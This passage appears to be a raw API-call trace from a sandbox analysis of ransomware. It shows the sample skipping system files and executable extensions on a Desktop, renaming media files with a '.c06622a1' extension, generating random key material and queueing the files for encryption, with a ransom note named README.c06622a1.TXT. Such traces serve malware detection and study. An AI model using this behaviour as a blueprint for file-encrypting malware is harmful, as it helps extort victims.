(_Str1="scr", _Str2="wav") returned -4 [0156.080] wcslen (_String="scr") returned 0x3 [0156.080] _wcsicmp (_Str1="shs", _Str2="wav") returned -4 [0156.080] wcslen (_String="shs") returned 0x3 [0156.080] _wcsicmp (_Str1="spl", _Str2="wav") returned -4 [0156.080] wcslen (_String="spl") returned 0x3 [0156.080] _wcsicmp (_Str1="sys", _Str2="wav") returned -4 [0156.080] wcslen (_String="sys") returned 0x3 [0156.080] _wcsicmp (_Str1="theme", _Str2="wav") returned -3 [0156.080] wcslen (_String="theme") returned 0x5 [0156.080] _wcsicmp (_Str1="themepack", _Str2="wav") returned -3 [0156.080] wcslen (_String="themepack") returned 0x9 [0156.080] _wcsicmp (_Str1="wpx", _Str2="wav") returned 15 [0156.080] wcslen (_String="wpx") returned 0x3 [0156.080] _wcsicmp (_Str1="lock", _Str2="wav") returned -11 [0156.080] wcslen (_String="lock") returned 0x4 [0156.080] _wcsicmp (_Str1="key", _Str2="wav") returned -12 [0156.080] wcslen (_String="key") returned 0x3 [0156.080] _wcsicmp (_Str1="hta", _Str2="wav") returned -15 [0156.080] wcslen (_String="hta") returned 0x3 [0156.080] _wcsicmp (_Str1="msi", _Str2="wav") returned -10 [0156.080] wcslen (_String="msi") returned 0x3 [0156.080] _wcsicmp (_Str1="pdb", _Str2="wav") returned -7 [0156.080] wcslen (_String="pdb") returned 0x3 [0156.080] _wcsicmp (_Str1="sqlite", _Str2="wav") returned -4 [0156.080] wcslen (_String="sqlite") returned 0x6 [0156.080] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0156.080] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x208e20 [0156.080] wcscpy (in: _Dest=0x208e20, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0156.080] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0156.080] wcscpy (in: _Dest=0x208e74, _Source="K2QW6o1V4zrGcZk.wav" | out: _Dest="K2QW6o1V4zrGcZk.wav") returned="K2QW6o1V4zrGcZk.wav" [0156.081] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\K2QW6o1V4zrGcZk.wav", dwFileAttributes=0x80) returned 1 [0156.083] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\K2QW6o1V4zrGcZk.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\k2qw6o1v4zrgczk.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0156.083] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.083] ReadFile (in: hFile=0x1a0, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0156.084] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0xb697422b [0156.084] RtlComputeCrc32 (PartialCrc=0x422b, Buffer=0x32ec24, Length=0x80) returned 0xbc6bfe94 [0156.084] RtlComputeCrc32 (PartialCrc=0xfe94, Buffer=0x32ec24, Length=0x80) returned 0x8f9f2a8e [0156.084] RtlComputeCrc32 (PartialCrc=0x2a8e, Buffer=0x32ec24, Length=0x80) returned 0x50667e62 [0156.084] RtlComputeCrc32 (PartialCrc=0x7e62, Buffer=0x32ec24, Length=0x80) returned 0x828bd8a2 [0156.084] CloseHandle (hObject=0x1a0) returned 1 [0156.084] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x218e28 [0156.084] wcscpy (in: _Dest=0x218e28, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\K2QW6o1V4zrGcZk.wav" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\K2QW6o1V4zrGcZk.wav") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\K2QW6o1V4zrGcZk.wav" [0156.084] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\K2QW6o1V4zrGcZk.wav") returned 0x3d [0156.084] wcscpy (in: _Dest=0x218ea2, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.084] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\K2QW6o1V4zrGcZk.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\k2qw6o1v4zrgczk.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\K2QW6o1V4zrGcZk.wav.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\k2qw6o1v4zrgczk.wav.c06622a1"), dwFlags=0x8) returned 1 [0156.087] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\K2QW6o1V4zrGcZk.wav.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\k2qw6o1v4zrgczk.wav.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1a0 [0156.087] CreateIoCompletionPort (FileHandle=0x1a0, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0156.087] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3480020 [0156.095] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7d64cf8e [0156.095] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x54e78c97 [0156.095] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x526ba7b5 [0156.095] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xf0888df [0156.095] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1212200e [0156.095] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3f98993 [0156.095] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xda769b1 [0156.095] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x506cfa76 [0156.098] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3480094, Length=0x80) returned 0x51489472 [0156.098] RtlComputeCrc32 (PartialCrc=0x9472, Buffer=0x3480094, Length=0x80) returned 0x397db3f9 [0156.098] RtlComputeCrc32 (PartialCrc=0xb3f9, Buffer=0x3480094, Length=0x80) returned 0xff04a6be [0156.098] RtlComputeCrc32 (PartialCrc=0xa6be, Buffer=0x3480094, Length=0x80) returned 0x8e1c0190 [0156.098] RtlComputeCrc32 (PartialCrc=0x190, Buffer=0x3480094, Length=0x80) returned 0x1f3a7277 [0156.098] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3480020) returned 1 [0156.098] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x208e20) returned 1 [0156.098] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x218e28) returned 1 [0156.098] FindNextFileW (in: hFindFile=0x1327c8, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x394cbdf0, ftCreationTime.dwHighDateTime=0x1d5e21c, ftLastAccessTime.dwLowDateTime=0x3d156bb0, ftLastAccessTime.dwHighDateTime=0x1d5dcab, ftLastWriteTime.dwLowDateTime=0x3d156bb0, ftLastWriteTime.dwHighDateTime=0x1d5dcab, nFileSizeHigh=0x0, nFileSizeLow=0xf7a6, dwReserved0=0x0, dwReserved1=0x0, cFileName="KmS7v8iA7McRcMINuK4X.mp4", cAlternateFileName="KMS7V8~1.MP4")) returned 1 [0156.098] _wcsicmp (_Str1="KmS7v8iA7McRcMINuK4X.mp4", _Str2="README.c06622a1.TXT") returned -7 [0156.098] wcsstr (_Str="KmS7v8iA7McRcMINuK4X.mp4", _SubStr="README") returned 0x0 [0156.098] _wcsicmp (_Str1="autorun.inf", _Str2="KmS7v8iA7McRcMINuK4X.mp4") returned -10 [0156.098] wcslen (_String="autorun.inf") returned 0xb [0156.098] _wcsicmp (_Str1="boot.ini", _Str2="KmS7v8iA7McRcMINuK4X.mp4") returned -9 [0156.098] wcslen (_String="boot.ini") returned 0x8 [0156.098] _wcsicmp (_Str1="bootfont.bin", _Str2="KmS7v8iA7McRcMINuK4X.mp4") returned -9 [0156.098] wcslen (_String="bootfont.bin") returned 0xc [0156.098] _wcsicmp (_Str1="bootsect.bak", _Str2="KmS7v8iA7McRcMINuK4X.mp4") returned -9 [0156.098] wcslen (_String="bootsect.bak") returned 0xc [0156.099] _wcsicmp (_Str1="desktop.ini", _Str2="KmS7v8iA7McRcMINuK4X.mp4") returned -7 [0156.099] wcslen (_String="desktop.ini") returned 0xb [0156.099] _wcsicmp (_Str1="iconcache.db", _Str2="KmS7v8iA7McRcMINuK4X.mp4") returned -2 [0156.099] wcslen (_String="iconcache.db") returned 0xc [0156.099] _wcsicmp (_Str1="ntldr", _Str2="KmS7v8iA7McRcMINuK4X.mp4") returned 3 [0156.099] wcslen (_String="ntldr") returned 0x5 [0156.099] _wcsicmp (_Str1="ntuser.dat", _Str2="KmS7v8iA7McRcMINuK4X.mp4") returned 3 [0156.099] wcslen (_String="ntuser.dat") returned 0xa [0156.099] _wcsicmp (_Str1="ntuser.dat.log", _Str2="KmS7v8iA7McRcMINuK4X.mp4") returned 3 [0156.099] wcslen (_String="ntuser.dat.log") returned 0xe [0156.099] _wcsicmp (_Str1="ntuser.ini", _Str2="KmS7v8iA7McRcMINuK4X.mp4") returned 3 [0156.099] wcslen (_String="ntuser.ini") returned 0xa [0156.099] _wcsicmp (_Str1="thumbs.db", _Str2="KmS7v8iA7McRcMINuK4X.mp4") returned 9 [0156.099] wcslen (_String="thumbs.db") returned 0x9 [0156.099] _wcsicmp (_Str1="386", _Str2="mp4") returned -58 [0156.099] wcslen (_String="386") returned 0x3 [0156.099] _wcsicmp (_Str1="adv", _Str2="mp4") returned -12 [0156.099] wcslen (_String="adv") returned 0x3 [0156.099] _wcsicmp (_Str1="ani", _Str2="mp4") returned -12 [0156.099] wcslen (_String="ani") returned 0x3 [0156.099] _wcsicmp (_Str1="bat", _Str2="mp4") returned -11 [0156.099] wcslen (_String="bat") returned 0x3 [0156.099] _wcsicmp (_Str1="bin", _Str2="mp4") returned -11 [0156.099] wcslen (_String="bin") returned 0x3 [0156.099] _wcsicmp (_Str1="cab", _Str2="mp4") returned -10 [0156.099] wcslen (_String="cab") returned 0x3 [0156.099] _wcsicmp (_Str1="cmd", _Str2="mp4") returned -10 [0156.099] wcslen (_String="cmd") returned 0x3 [0156.099] _wcsicmp (_Str1="com", _Str2="mp4") returned -10 [0156.099] wcslen (_String="com") returned 0x3 [0156.099] _wcsicmp (_Str1="cpl", _Str2="mp4") returned -10 [0156.099] wcslen (_String="cpl") returned 0x3 [0156.100] _wcsicmp (_Str1="cur", _Str2="mp4") returned -10 [0156.100] wcslen (_String="cur") returned 0x3 [0156.100] _wcsicmp (_Str1="deskthemepack", _Str2="mp4") returned -9 [0156.100] wcslen (_String="deskthemepack") returned 0xd [0156.100] _wcsicmp (_Str1="diagcab", _Str2="mp4") returned -9 [0156.100] wcslen (_String="diagcab") returned 0x7 [0156.100] _wcsicmp (_Str1="diagcfg", _Str2="mp4") returned -9 [0156.100] wcslen (_String="diagcfg") returned 0x7 [0156.100] _wcsicmp (_Str1="diagpkg", _Str2="mp4") returned -9 [0156.100] wcslen (_String="diagpkg") returned 0x7 [0156.100] _wcsicmp (_Str1="dll", _Str2="mp4") returned -9 [0156.100] wcslen (_String="dll") returned 0x3 [0156.100] _wcsicmp (_Str1="drv", _Str2="mp4") returned -9 [0156.100] wcslen (_String="drv") returned 0x3 [0156.100] _wcsicmp (_Str1="exe", _Str2="mp4") returned -8 [0156.100] wcslen (_String="exe") returned 0x3 [0156.100] _wcsicmp (_Str1="hlp", _Str2="mp4") returned -5 [0156.100] wcslen (_String="hlp") returned 0x3 [0156.100] _wcsicmp (_Str1="icl", _Str2="mp4") returned -4 [0156.100] wcslen (_String="icl") returned 0x3 [0156.100] _wcsicmp (_Str1="icns", _Str2="mp4") returned -4 [0156.100] wcslen (_String="icns") returned 0x4 [0156.100] _wcsicmp (_Str1="ico", _Str2="mp4") returned -4 [0156.100] wcslen (_String="ico") returned 0x3 [0156.100] _wcsicmp (_Str1="ics", _Str2="mp4") returned -4 [0156.100] wcslen (_String="ics") returned 0x3 [0156.100] _wcsicmp (_Str1="idx", _Str2="mp4") returned -4 [0156.100] wcslen (_String="idx") returned 0x3 [0156.100] _wcsicmp (_Str1="ldf", _Str2="mp4") returned -1 [0156.100] wcslen (_String="ldf") returned 0x3 [0156.100] _wcsicmp (_Str1="lnk", _Str2="mp4") returned -1 [0156.100] wcslen (_String="lnk") returned 0x3 [0156.101] _wcsicmp (_Str1="mod", _Str2="mp4") returned -1 [0156.101] wcslen (_String="mod") returned 0x3 [0156.101] _wcsicmp (_Str1="mpa", _Str2="mp4") returned 45 [0156.101] wcslen (_String="mpa") returned 0x3 [0156.101] _wcsicmp (_Str1="msc", _Str2="mp4") returned 3 [0156.101] wcslen (_String="msc") returned 0x3 [0156.101] _wcsicmp (_Str1="msp", _Str2="mp4") returned 3 [0156.101] wcslen (_String="msp") returned 0x3 [0156.101] _wcsicmp (_Str1="msstyles", _Str2="mp4") returned 3 [0156.101] wcslen (_String="msstyles") returned 0x8 [0156.101] _wcsicmp (_Str1="msu", _Str2="mp4") returned 3 [0156.101] wcslen (_String="msu") returned 0x3 [0156.101] _wcsicmp (_Str1="nls", _Str2="mp4") returned 1 [0156.101] wcslen (_String="nls") returned 0x3 [0156.101] _wcsicmp (_Str1="nomedia", _Str2="mp4") returned 1 [0156.101] wcslen (_String="nomedia") returned 0x7 [0156.101] _wcsicmp (_Str1="ocx", _Str2="mp4") returned 2 [0156.101] wcslen (_String="ocx") returned 0x3 [0156.101] _wcsicmp (_Str1="prf", _Str2="mp4") returned 3 [0156.101] wcslen (_String="prf") returned 0x3 [0156.101] _wcsicmp (_Str1="ps1", _Str2="mp4") returned 3 [0156.101] wcslen (_String="ps1") returned 0x3 [0156.101] _wcsicmp (_Str1="rom", _Str2="mp4") returned 5 [0156.101] wcslen (_String="rom") returned 0x3 [0156.101] _wcsicmp (_Str1="rtp", _Str2="mp4") returned 5 [0156.101] wcslen (_String="rtp") returned 0x3 [0156.101] _wcsicmp (_Str1="scr", _Str2="mp4") returned 6 [0156.101] wcslen (_String="scr") returned 0x3 [0156.101] _wcsicmp (_Str1="shs", _Str2="mp4") returned 6 [0156.101] wcslen (_String="shs") returned 0x3 [0156.101] _wcsicmp (_Str1="spl", _Str2="mp4") returned 6 [0156.101] wcslen (_String="spl") returned 0x3 [0156.102] _wcsicmp (_Str1="sys", _Str2="mp4") returned 6 [0156.102] wcslen (_String="sys") returned 0x3 [0156.102] _wcsicmp (_Str1="theme", _Str2="mp4") returned 7 [0156.102] wcslen (_String="theme") returned 0x5 [0156.102] _wcsicmp (_Str1="themepack", _Str2="mp4") returned 7 [0156.102] wcslen (_String="themepack") returned 0x9 [0156.102] _wcsicmp (_Str1="wpx", _Str2="mp4") returned 10 [0156.102] wcslen (_String="wpx") returned 0x3 [0156.102] _wcsicmp (_Str1="lock", _Str2="mp4") returned -1 [0156.102] wcslen (_String="lock") returned 0x4 [0156.102] _wcsicmp (_Str1="key", _Str2="mp4") returned -2 [0156.102] wcslen (_String="key") returned 0x3 [0156.102] _wcsicmp (_Str1="hta", _Str2="mp4") returned -5 [0156.102] wcslen (_String="hta") returned 0x3 [0156.102] _wcsicmp (_Str1="msi", _Str2="mp4") returned 3 [0156.102] wcslen (_String="msi") returned 0x3 [0156.102] _wcsicmp (_Str1="pdb", _Str2="mp4") returned 3 [0156.102] wcslen (_String="pdb") returned 0x3 [0156.102] _wcsicmp (_Str1="sqlite", _Str2="mp4") returned 6 [0156.102] wcslen (_String="sqlite") returned 0x6 [0156.102] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0156.102] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x208e20 [0156.102] wcscpy (in: _Dest=0x208e20, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0156.102] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0156.102] wcscpy (in: _Dest=0x208e74, _Source="KmS7v8iA7McRcMINuK4X.mp4" | out: _Dest="KmS7v8iA7McRcMINuK4X.mp4") returned="KmS7v8iA7McRcMINuK4X.mp4" [0156.102] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KmS7v8iA7McRcMINuK4X.mp4", dwFileAttributes=0x80) returned 1 [0156.103] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KmS7v8iA7McRcMINuK4X.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kms7v8ia7mcrcminuk4x.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0156.103] SetFilePointerEx (in: hFile=0x1c8, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.103] ReadFile (in: hFile=0x1c8, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0156.104] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0x8951bd14 [0156.104] RtlComputeCrc32 (PartialCrc=0xbd14, Buffer=0x32ec24, Length=0x80) returned 0x50510252 [0156.104] RtlComputeCrc32 (PartialCrc=0x252, Buffer=0x32ec24, Length=0x80) returned 0x6737f305 [0156.104] RtlComputeCrc32 (PartialCrc=0xf305, Buffer=0x32ec24, Length=0x80) returned 0xc0fae492 [0156.104] RtlComputeCrc32 (PartialCrc=0xe492, Buffer=0x32ec24, Length=0x80) returned 0xfe8cb23a [0156.104] CloseHandle (hObject=0x1c8) returned 1 [0156.104] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x218e28 [0156.104] wcscpy (in: _Dest=0x218e28, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KmS7v8iA7McRcMINuK4X.mp4" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KmS7v8iA7McRcMINuK4X.mp4") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KmS7v8iA7McRcMINuK4X.mp4" [0156.104] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KmS7v8iA7McRcMINuK4X.mp4") returned 0x42 [0156.104] wcscpy (in: _Dest=0x218eac, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.104] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KmS7v8iA7McRcMINuK4X.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kms7v8ia7mcrcminuk4x.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KmS7v8iA7McRcMINuK4X.mp4.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kms7v8ia7mcrcminuk4x.mp4.c06622a1"), dwFlags=0x8) returned 1 [0156.107] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KmS7v8iA7McRcMINuK4X.mp4.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\kms7v8ia7mcrcminuk4x.mp4.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1c8 [0156.107] CreateIoCompletionPort (FileHandle=0x1c8, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0156.107] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3510020 [0156.114] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2a1a6b50 [0156.114] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3b48fd10 [0156.114] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2b4889d [0156.114] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xaa89b7e [0156.114] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x57bc91d9 [0156.114] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1a3bf5bc [0156.114] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x343bc3b0 [0156.114] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5ab33668 [0156.117] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3510094, Length=0x80) returned 0x5c140482 [0156.117] RtlComputeCrc32 (PartialCrc=0x482, Buffer=0x3510094, Length=0x80) returned 0xa950af32 [0156.117] RtlComputeCrc32 (PartialCrc=0xaf32, Buffer=0x3510094, Length=0x80) returned 0x8183a9a8 [0156.117] RtlComputeCrc32 (PartialCrc=0xa9a8, Buffer=0x3510094, Length=0x80) returned 0xc105db54 [0156.117] RtlComputeCrc32 (PartialCrc=0xdb54, Buffer=0x3510094, Length=0x80) returned 0xeae6a4a [0156.117] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3510020) returned 1 [0156.117] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x208e20) returned 1 [0156.117] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x218e28) returned 1 [0156.117] FindNextFileW (in: hFindFile=0x1327c8, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x782c67c0, ftCreationTime.dwHighDateTime=0x1d5d91e, ftLastAccessTime.dwLowDateTime=0x200e6e90, ftLastAccessTime.dwHighDateTime=0x1d5e0ca, ftLastWriteTime.dwLowDateTime=0x200e6e90, ftLastWriteTime.dwHighDateTime=0x1d5e0ca, nFileSizeHigh=0x0, nFileSizeLow=0xe013, dwReserved0=0x0, dwReserved1=0x0, cFileName="kndXrUZ5-qVM-oAY.m4a", cAlternateFileName="KNDXRU~1.M4A")) returned 1 [0156.117] _wcsicmp (_Str1="kndXrUZ5-qVM-oAY.m4a", _Str2="README.c06622a1.TXT") returned -7 [0156.118] wcsstr (_Str="kndXrUZ5-qVM-oAY.m4a", _SubStr="README") returned 0x0 [0156.118] _wcsicmp (_Str1="autorun.inf", _Str2="kndXrUZ5-qVM-oAY.m4a") returned -10 [0156.118] wcslen (_String="autorun.inf") returned 0xb [0156.118] _wcsicmp (_Str1="boot.ini", _Str2="kndXrUZ5-qVM-oAY.m4a") returned -9 [0156.118] wcslen (_String="boot.ini") returned 0x8 [0156.118] _wcsicmp (_Str1="bootfont.bin", _Str2="kndXrUZ5-qVM-oAY.m4a") returned -9 [0156.118] wcslen (_String="bootfont.bin") returned 0xc [0156.118] _wcsicmp (_Str1="bootsect.bak", _Str2="kndXrUZ5-qVM-oAY.m4a") returned -9 [0156.118] wcslen (_String="bootsect.bak") returned 0xc [0156.118] _wcsicmp (_Str1="desktop.ini", _Str2="kndXrUZ5-qVM-oAY.m4a") returned -7 [0156.118] wcslen (_String="desktop.ini") returned 0xb [0156.118] _wcsicmp (_Str1="iconcache.db", _Str2="kndXrUZ5-qVM-oAY.m4a") returned -2 [0156.118] wcslen (_String="iconcache.db") returned 0xc [0156.118] _wcsicmp (_Str1="ntldr", _Str2="kndXrUZ5-qVM-oAY.m4a") returned 3 [0156.118] wcslen (_String="ntldr") returned 0x5 [0156.118] _wcsicmp (_Str1="ntuser.dat", _Str2="kndXrUZ5-qVM-oAY.m4a") returned 3 [0156.118] wcslen (_String="ntuser.dat") returned 0xa [0156.118] _wcsicmp (_Str1="ntuser.dat.log", _Str2="kndXrUZ5-qVM-oAY.m4a") returned 3 [0156.118] wcslen (_String="ntuser.dat.log") returned 0xe [0156.118] _wcsicmp (_Str1="ntuser.ini", _Str2="kndXrUZ5-qVM-oAY.m4a") returned 3 [0156.118] wcslen (_String="ntuser.ini") returned 0xa [0156.118] _wcsicmp (_Str1="thumbs.db", _Str2="kndXrUZ5-qVM-oAY.m4a") returned 9 [0156.118] wcslen (_String="thumbs.db") returned 0x9 [0156.118] _wcsicmp (_Str1="386", _Str2="m4a") returned -58 [0156.118] wcslen (_String="386") returned 0x3 [0156.119] _wcsicmp (_Str1="adv", _Str2="m4a") returned -12 [0156.119] wcslen (_String="adv") returned 0x3 [0156.119] _wcsicmp (_Str1="ani", _Str2="m4a") returned -12 [0156.119] wcslen (_String="ani") returned 0x3 [0156.119] _wcsicmp (_Str1="bat", _Str2="m4a") returned -11 [0156.119] wcslen (_String="bat") returned 0x3 [0156.119] _wcsicmp (_Str1="bin", _Str2="m4a") returned -11 [0156.119] wcslen (_String="bin") returned 0x3 [0156.119] _wcsicmp (_Str1="cab", _Str2="m4a") returned -10 [0156.119] wcslen (_String="cab") returned 0x3 [0156.119] _wcsicmp (_Str1="cmd", _Str2="m4a") returned -10 [0156.119] wcslen (_String="cmd") returned 0x3 [0156.119] _wcsicmp (_Str1="com", _Str2="m4a") returned -10 [0156.119] wcslen (_String="com") returned 0x3 [0156.119] _wcsicmp (_Str1="cpl", _Str2="m4a") returned -10 [0156.119] wcslen (_String="cpl") returned 0x3 [0156.119] _wcsicmp (_Str1="cur", _Str2="m4a") returned -10 [0156.119] wcslen (_String="cur") returned 0x3 [0156.119] _wcsicmp (_Str1="deskthemepack", _Str2="m4a") returned -9 [0156.119] wcslen (_String="deskthemepack") returned 0xd [0156.119] _wcsicmp (_Str1="diagcab", _Str2="m4a") returned -9 [0156.119] wcslen (_String="diagcab") returned 0x7 [0156.119] _wcsicmp (_Str1="diagcfg", _Str2="m4a") returned -9 [0156.119] wcslen (_String="diagcfg") returned 0x7 [0156.119] _wcsicmp (_Str1="diagpkg", _Str2="m4a") returned -9 [0156.119] wcslen (_String="diagpkg") returned 0x7 [0156.119] _wcsicmp (_Str1="dll", _Str2="m4a") returned -9 [0156.120] wcslen (_String="dll") returned 0x3 [0156.120] _wcsicmp (_Str1="drv", _Str2="m4a") returned -9 [0156.120] wcslen (_String="drv") returned 0x3 [0156.120] _wcsicmp (_Str1="exe", _Str2="m4a") returned -8 [0156.120] wcslen (_String="exe") returned 0x3 [0156.120] _wcsicmp (_Str1="hlp", _Str2="m4a") returned -5 [0156.120] wcslen (_String="hlp") returned 0x3 [0156.120] _wcsicmp (_Str1="icl", _Str2="m4a") returned -4 [0156.120] wcslen (_String="icl") returned 0x3 [0156.120] _wcsicmp (_Str1="icns", _Str2="m4a") returned -4 [0156.120] wcslen (_String="icns") returned 0x4 [0156.120] _wcsicmp (_Str1="ico", _Str2="m4a") returned -4 [0156.120] wcslen (_String="ico") returned 0x3 [0156.120] _wcsicmp (_Str1="ics", _Str2="m4a") returned -4 [0156.120] wcslen (_String="ics") returned 0x3 [0156.120] _wcsicmp (_Str1="idx", _Str2="m4a") returned -4 [0156.120] wcslen (_String="idx") returned 0x3 [0156.120] _wcsicmp (_Str1="ldf", _Str2="m4a") returned -1 [0156.120] wcslen (_String="ldf") returned 0x3 [0156.120] _wcsicmp 